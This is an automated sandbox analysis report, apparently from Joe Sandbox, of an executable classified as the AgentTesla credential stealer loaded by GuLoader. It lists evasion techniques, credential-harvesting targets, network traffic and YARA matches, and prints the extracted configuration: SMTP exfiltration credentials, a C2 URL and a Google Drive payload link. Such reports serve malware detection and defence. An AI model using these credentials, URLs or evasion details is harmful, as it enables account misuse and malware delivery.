Play interactive tour

Edit tour

Analysis Report ordine n#U00b0 276.exe

Overview

General Information

Sample Name:	ordine n#U00b0 276.exe
Analysis ID:	403969
MD5:	10f03c95ba280cd5a82146269f89ca9d
SHA1:	c24232721d7aefe2c013b9642e0ab7db8007e48a
SHA256:	11f63d2fda1055ac66a71cb539c9d5ff66fd79f473e19171fd8f663e2c4979b9
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: RegAsm connects to smtp port

Yara detected AgentTesla

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Hides threads from debuggers

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w10x64

ordine n#U00b0 276.exe (PID: 6888 cmdline: 'C:\Users\user\Desktop\ordine n#U00b0 276.exe' MD5: 10F03C95BA280CD5A82146269F89CA9D)

RegAsm.exe (PID: 1280 cmdline: 'C:\Users\user\Desktop\ordine n#U00b0 276.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "Bx27nFj5fV0", "URL: ": "http://9OElorZCtFCqdkfzny.net", "To: ": "greendogman@yandex.com", "ByHost: ": "smtp.fil-net.com:587", "Password: ": "jEiJ6rpwhGxFJ", "From: ": "comercial@fil-net.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x1298:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000000.00000000.643378031.000000000040C000.00000020.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x1298:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Process Memory Space: RegAsm.exe PID: 1280	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 1280	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1280	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 2 entries

Sigma Overview

Networking:

Sigma detected: RegAsm connects to smtp port

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 46.16.61.250, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Initiated: true, ProcessId: 1280, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49764

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: RegAsm.exe.1280.8.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "Bx27nFj5fV0", "URL: ": "http://9OElorZCtFCqdkfzny.net", "To: ": "greendogman@yandex.com", "ByHost: ": "smtp.fil-net.com:587", "Password: ": "jEiJ6rpwhGxFJ", "From: ": "comercial@fil-net.com"}

Source: ordine n#U00b0 276.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.4:49745 version: TLS 1.2

Source:

Binary string: mscorrc.pdb source: RegAsm.exe, 00000008.00000002.1734186092.0000000020A70000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://9OElorZCtFCqdkfzny.net

Source: global traffic

TCP traffic: 192.168.2.4:49764 -> 46.16.61.250:587

Source: Joe Sandbox View

IP Address: 46.16.61.250 46.16.61.250

Source: Joe Sandbox View

ASN Name: CDMONsistemescdmoncomES CDMONsistemescdmoncomES

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

TCP traffic: 192.168.2.4:49764 -> 46.16.61.250:587

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 8_2_1DB3A09A recv,

8_2_1DB3A09A

Source: unknown

DNS traffic detected: queries for: doc-10-9k-docs.googleusercontent.com

Source: RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	String found in binary or memory: http://9OElorZCtFCqdkfzny.net
Source: RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000008.00000002.1732276506.000000001FF5D000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: RegAsm.exe, 00000008.00000002.1732276506.000000001FF5D000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: RegAsm.exe, 00000008.00000002.1732276506.000000001FF5D000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: RegAsm.exe, 00000008.00000002.1732276506.000000001FF5D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
Source: RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	String found in binary or memory: http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0
Source: RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	String found in binary or memory: http://mGfDbY.com
Source: RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1c301
Source: RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
Source: RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: RegAsm.exe, 00000008.00000002.1732276506.000000001FF5D000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0%
Source: RegAsm.exe, 00000008.00000002.1732276506.000000001FF5D000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: RegAsm.exe, 00000008.00000003.999355961.00000000013FA000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RegAsm.exe, 00000008.00000002.1726751510.0000000001380000.00000004.00000020.sdmp	String found in binary or memory: https://doc-10-9k-docs.googleusercontent.com/
Source: RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-9k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ka3e4p4q
Source: RegAsm.exe, 00000008.00000002.1726830201.00000000013A4000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 00000008.00000002.1726776559.0000000001388000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1eL1W59FTaS1ZK7NLLis7VKY3s5Fdhau-
Source: RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.4:49745 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000000.643378031.000000000040C000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B954FB NtResumeThread,	0_2_02B954FB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_1DB3B0BA NtQuerySystemInformation,	8_2_1DB3B0BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_1DB3B089 NtQuerySystemInformation,	8_2_1DB3B089

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040377D	0_2_0040377D
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404647	0_2_00404647
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404263	0_2_00404263
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404463	0_2_00404463
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404A2C	0_2_00404A2C
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040483D	0_2_0040483D
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_004038C1	0_2_004038C1
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040408E	0_2_0040408E
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00403CB3	0_2_00403CB3
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404746	0_2_00404746
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404551	0_2_00404551
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404365	0_2_00404365
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00403F32	0_2_00403F32
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040493B	0_2_0040493B
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_004039C7	0_2_004039C7
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_004037CB	0_2_004037CB
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00403F94	0_2_00403F94
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00403D9F	0_2_00403D9F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_01600070	8_2_01600070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_01600F38	8_2_01600F38
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_01602C00	8_2_01602C00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_01607718	8_2_01607718
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_01607DC1	8_2_01607DC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_01603580	8_2_01603580
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_01605A8F	8_2_01605A8F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_01607628	8_2_01607628
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_01600006	8_2_01600006
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_1DB3247D	8_2_1DB3247D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_20017C48	8_2_20017C48
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_2001E85C	8_2_2001E85C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_20018EF0	8_2_20018EF0

Source: ordine n#U00b0 276.exe

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: ordine n#U00b0 276.exe, 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameOPARBE.exe vs ordine n#U00b0 276.exe
Source: ordine n#U00b0 276.exe	Binary or memory string: OriginalFilenameOPARBE.exe vs ordine n#U00b0 276.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: security.dll			Jump to behavior

Source: ordine n#U00b0 276.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000000.643378031.000000000040C000.00000020.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@4/2@3/3

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_1DB3AF3E AdjustTokenPrivileges,		8_2_1DB3AF3E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_1DB3AF07 AdjustTokenPrivileges,		8_2_1DB3AF07

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File created: C:\Users\user\AppData\Roaming\3blxsn2e.5rk

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe

File created: C:\Users\user\AppData\Local\Temp\~DFD8804A7BDBB85CBA.TMP

Jump to behavior

Source: ordine n#U00b0 276.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ordine n#U00b0 276.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:

Binary string: mscorrc.pdb source: RegAsm.exe, 00000008.00000002.1734186092.0000000020A70000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 1280, type: MEMORY

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00407CDB push es; iretd	0_2_00407CDC
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040CEF8 push ebp; iretd	0_2_0040CEFE
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040855C push esp; iretd	0_2_00408564
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00408565 push esp; iretd	0_2_00408564
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00408565 push esp; iretd	0_2_00408598
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00407D6F push edx; iretd	0_2_00407D7C
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00407B2B push ds; retf	0_2_00407B68
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00407FCC push esp; iretd	0_2_00407FD0
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00405BD3 push DD90C9D6h; retf	0_2_00405CCC
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00408DD4 push esi; retf	0_2_00408DD5
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00405BE4 push DD90C9D6h; retf	0_2_00405CCC
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00407F8D push esp; iretd	0_2_00407FB8
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00405D90 push esp; iretd	0_2_00405DA8
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B908BE push 0000002Bh; retf	0_2_02B908BD
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B9088C push 0000002Bh; retf	0_2_02B908BD
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B922FA push edx; ret	0_2_02B92310
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B908D7 push 0000002Bh; retf	0_2_02B908BD
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B900C5 pushad ; ret	0_2_02B900C6
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B9303C push 7446A32Bh; ret	0_2_02B93048
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B91C7F push ebp; ret	0_2_02B91C80
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B92A73 push FFFFFFD4h; ret	0_2_02B92A9C
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B94A77 push edx; retf	0_2_02B94A65
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B94A62 push edx; retf	0_2_02B94A65
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B92A4C push FFFFFFD4h; ret	0_2_02B92A9C
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B917D6 push edx; ret	0_2_02B917DC
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B9132B push ebp; ret	0_2_02B91350
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02B9470A push ecx; iretd	0_2_02B9472F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 8_2_1DB3247D push FFFFFFC3h; ret	8_2_1DB33465

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
